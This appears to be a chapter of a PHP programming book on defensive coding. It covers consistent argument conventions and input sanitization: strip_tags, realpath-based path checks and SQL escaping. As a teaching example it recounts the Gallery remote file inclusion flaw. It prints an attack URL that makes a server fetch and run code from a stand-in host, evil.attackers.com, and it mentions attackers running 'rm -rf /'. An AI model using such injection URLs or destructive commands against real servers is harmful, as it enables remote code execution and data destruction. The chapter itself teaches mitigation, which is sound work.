Defensive Coding

Defensive coding is the practice of eliminating assumptions in the code, especially when it comes to handling information in and out of other routines.

In lower-level languages such as C and C++, defensive coding is a different activity. In C, variable type enforcement is handled by the compiler; a user's code must handle cleaning up resources and avoiding buffer overflows. PHP is a high-level language; resource, memory, and buffer management are all managed internally by PHP. PHP is also dynamically typed, which means that you, the developer, are responsible for performing any type checking that is necessary (unless you are using objects, in which case you can use type hints).
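As a rough illustration of what that responsibility looks like, the sketch below checks a scalar argument by hand and relies on a class type hint for an object argument. The names Account and apply_credit() are hypothetical and exist only for this example.

```php
<?php
// Hypothetical class, used only to demonstrate a class type hint.
class Account
{
    public $balance = 0;
}

// The Account hint makes PHP reject any non-Account argument;
// the amount is a scalar, so it is checked by hand.
function apply_credit(Account $account, $amount)
{
    if (!is_int($amount) || $amount <= 0) {
        throw new InvalidArgumentException('amount must be a positive integer');
    }
    $account->balance += $amount;
    return $account->balance;
}

$account = new Account();
echo apply_credit($account, 50), "\n";

try {
    apply_credit($account, '50 OR 1=1');   // a string, not an integer
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Rejecting the bad value at the function boundary keeps the false assumption ("this is always an integer") from spreading into the rest of the code.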

There are two keys to effective defensive coding in PHP:

  • Establishing coding standards to prevent accidental syntax bugs

  • Using sanitization techniques to avoid malicious data

Establishing Standard Conventions

Defensive coding is not all about attacks. Most bugs occur because of carelessness and false assumptions. The easiest way to make sure other developers use your code correctly is to make sure that all your code follows standards for argument order and return values. Some people argue that comprehensive documentation means that argument ordering doesn't matter. I disagree. Having to reference the manual or your own documentation every time you use a function makes development slow and error prone.

A prime example of inconsistent argument ordering is the MySQL and PostgreSQL PHP client APIs. Here are the prototypes of the query functions from each library:

resource mysql_query ( string query [, resource connection])
resource pg_query ( resource connection, string query)

Although this difference is clearly documented, it is nonetheless confusing.

Return values should be similarly well defined and consistent. For Boolean functions, this is simple: Return true on success and false on failure. If you use exceptions for error handling, they should exist in a well-defined hierarchy, as described in Chapter 3.
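One way to picture these conventions is the small sketch below. Everything in it (AppException, StorageException, cache_set(), cache_get()) is invented for illustration and is not the hierarchy from Chapter 3. Both functions take the container first and the key second, the Boolean function returns only true or false, and the throwing function raises an exception from a single hierarchy.

```php
<?php
// Hypothetical hierarchy: every exception extends one base class,
// so callers can catch narrowly or broadly.
class AppException extends Exception {}
class StorageException extends AppException {}

// Boolean convention: true on success, false on failure, nothing else.
function cache_set(array &$cache, $key, $value)
{
    if (!is_string($key) || $key === '') {
        return false;
    }
    $cache[$key] = $value;
    return true;
}

// Exception convention: a missing key surfaces as a StorageException.
function cache_get(array $cache, $key)
{
    if (!array_key_exists($key, $cache)) {
        throw new StorageException("no such key: $key");
    }
    return $cache[$key];
}

$cache = array();
var_dump(cache_set($cache, 'user', 'george'));
var_dump(cache_set($cache, '', 'nobody'));

try {
    cache_get($cache, 'missing');
} catch (AppException $e) {
    echo get_class($e), ': ', $e->getMessage(), "\n";
}
```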

Using Sanitization Techniques

In late 2002, a widely publicized exploit was found in Gallery, photo album software written in PHP. Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to change the default base directory for the software. The default behavior left the variable unset. Inside the code, the require() statements all looked like this:

<? require($GALLERY_BASEDIR . "init.php"); ?>

The result was that if the server was running with register_globals on (which was the default behavior in earlier versions of PHP), an attacker could make a request like this:

http://gallery.example.com/view_photo.php?\
  GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F

This would cause the require to actually evaluate as the following:

<? require("http://evil.attackers.com/evilscript.php?init.php"); ?>

This would then download and execute the specified code from evil.attackers.com. Not good at all. Because PHP is an extremely versatile language, this meant that attackers could execute any local system commands they desired. Examples of attacks included installing backdoors, executing `rm -rf /`, downloading the password file, and generally performing any imaginable malicious act.

This sort of attack is known as remote command injection because it tricks the remote server into executing code it should not execute. It illustrates a number of security precautions that you should take in every application:

  • Always turn off register_globals. register_globals is present only for backward compatibility. It is a tremendous security problem.

  • Unless you really need it, set allow_url_fopen = Off in your php.ini file. The Gallery exploit worked because all the PHP file functions (fopen(), include(), require(), and so on) can take arbitrary URLs instead of simple file paths. Although this feature is neat, it also causes problems. The Gallery developers clearly never intended for remote files to be specified for $GALLERY_BASEDIR, and they did not code with that possibility in mind. In his talk "One Year of PHP at Yahoo!", Michael Radwin suggested avoiding URL fopen() calls completely and instead using the curl extension that comes with PHP. This ensures that when you open a remote resource, you do so deliberately.

  • Always validate your data. Although $GALLERY_BASEDIR was never meant to be set from the request, even if it had been, you should validate that what you have looks reasonable. Are filesystem paths correct? Are you attempting to reference files outside the tree where you should be? PHP provides a partial solution to this problem with its open_basedir php.ini option. Setting open_basedir prevents access to any file that lies outside the specified directory.

    Unfortunately, open_basedir carries some performance overhead and creates a number of hurdles that developers must overcome to write compatible code. In practice, it is most useful in hosted serving environments to ensure that users do not violate each other's privacy and security.
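The validation described in the last bullet might look something like the following sketch. It is not Gallery's actual fix. The helper name checked_basedir() and the idea of an allowed root directory are assumptions made for this example. The function refuses anything that looks like a URL and anything that does not resolve to a real directory at or below the allowed root.

```php
<?php
// Hypothetical helper: accept a base directory only if it is a real local
// directory at or below $allowed_root. Returns the canonical path with a
// trailing separator, or false when the candidate is rejected.
function checked_basedir($candidate, $allowed_root)
{
    // Reject anything that looks like a URL or stream wrapper (http://, ftp://, php://).
    if (!is_string($candidate) || strpos($candidate, '://') !== false) {
        return false;
    }
    $real = realpath($candidate);
    $root = realpath($allowed_root);
    if ($real === false || $root === false || !is_dir($real)) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // The candidate must be the root itself or a directory beneath it.
    if (strncmp($real, $root, strlen($root)) !== 0) {
        return false;
    }
    return $real;
}

// The system temp directory stands in for the application root here.
$root = sys_get_temp_dir();
var_dump(checked_basedir('http://evil.attackers.com/evilscript.php?', $root));
var_dump(checked_basedir($root, $root));
```

A check like this complements, rather than replaces, turning off register_globals and allow_url_fopen: it still holds if a configuration setting is changed later.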

Data sanitization is an important part of security. If you know your data should not have HTML in it, you can remove HTML with strip_tags, as shown here:

// username should not contain HTML
$username = strip_tags($_COOKIE['username']);

Allowing HTML in user-submitted input is an invitation to cross-site scripting attacks. Cross-site scripting attacks are discussed further in Chapter 3, "Error Handling."
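The sketch below puts the strip_tags() call into a small helper and pairs it with output escaping through htmlspecialchars(). The pairing is an addition for illustration, not something the text above prescribes, and the helper names clean_username() and html_escape() are hypothetical. Note that strip_tags() removes the tags themselves but keeps the text between them.

```php
<?php
// Hypothetical helper: strip markup from input on the way in.
function clean_username($raw)
{
    return trim(strip_tags((string) $raw));
}

// Hypothetical helper: escape on the way out, so anything that
// survived is rendered as text rather than interpreted as HTML.
function html_escape($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

$raw = '<script>alert("xss")</script>george';
$username = clean_username($raw);   // tags removed, inner text kept
echo $username, "\n";
echo html_escape($username), "\n";
```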

Similarly, if a filename is passed in, you can manually verify that it does not backtrack out of the current directory:

$filename = $_GET['filename'];
if(substr($filename, 0, 1) == '/' || strstr($filename, "..")) {
  // file is bad
}

Here's an alternative:

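$file_name = realpath($_GET['filename']);
$good_path = realpath("./") . DIRECTORY_SEPARATOR;
// realpath() returns false for a nonexistent path; strncmp() returns 0 on a match
if($file_name === false || strncmp($file_name, $good_path, strlen($good_path)) != 0) {
  // file is bad
}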

The latter check is stricter but also more expensive.
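The realpath() comparison can be wrapped in a reusable function, sketched below under a few assumptions: the helper name is_inside_dir() is hypothetical, the requested name is resolved relative to the base directory rather than the current directory, and the base path is given a trailing separator so that a sibling directory sharing the same prefix is not mistaken for a match.

```php
<?php
// Hypothetical helper: true only if $requested resolves to an existing
// path strictly inside $base_dir.
function is_inside_dir($requested, $base_dir)
{
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return false;   // realpath() fails for paths that do not exist
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // strncmp() returns 0 when the first strlen($base) bytes match.
    return strncmp($path, $base, strlen($base)) === 0;
}

// Build a throwaway directory with one file so the check has something to resolve.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'defcode_' . uniqid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'photo.txt', 'ok');

var_dump(is_inside_dir('photo.txt', $base));          // a file in the tree
var_dump(is_inside_dir('../../etc/passwd', $base));   // backtracks out of the tree

unlink($base . DIRECTORY_SEPARATOR . 'photo.txt');
rmdir($base);
```

Because strncmp() returns 0 on a match, the comparison is written explicitly against 0 rather than negated, which is an easy place to invert the logic by accident.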

Another data sanitization step you should always perform is running mysql_escape_string() (or the function appropriate to your RDBMS) on all data passed into any SQL query. Much as there are remote command injection attacks, there are SQL injection attacks. Using an abstraction layer such as the DB classes developed in Chapter 2, "Object-Oriented Programming Through Design Patterns," can help automate this.
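The mysql_* functions named above belong to the original MySQL extension, which was removed in PHP 7. As a hedged alternative, and not the DB classes from Chapter 2, the sketch below uses PDO prepared statements, which keep data out of the SQL text entirely instead of escaping it. The function find_user_id(), the users table, and the in-memory SQLite database are assumptions made for the example. The demo runs only when the pdo_sqlite driver is installed.

```php
<?php
// Hypothetical lookup: the username is bound as a parameter,
// never concatenated into the SQL text.
function find_user_id(PDO $db, $username)
{
    $stmt = $db->prepare('SELECT id FROM users WHERE username = ?');
    $stmt->execute(array($username));
    $id = $stmt->fetchColumn();
    return $id === false ? null : (int) $id;
}

// Demo against an in-memory SQLite database, if that PDO driver is available.
if (extension_loaded('pdo_sqlite')) {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)');
    $db->exec("INSERT INTO users (username) VALUES ('george')");

    var_dump(find_user_id($db, 'george'));
    // The injection attempt is treated as a literal (and unknown) username.
    var_dump(find_user_id($db, "x' OR '1'='1"));
}
```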

Chapter 23, "Writing SAPIs and Extending the Zend Engine," details how to write input filters in C to automatically run sanitization code on the input to every request.

Data validation is a close cousin of data sanitization. People may not use your functions in the way you intend. Failing to validate your inputs not only leaves you open to security holes but can also lead to an application functioning incorrectly and to trash data in a database. Data validation is covered in Chapter 3.

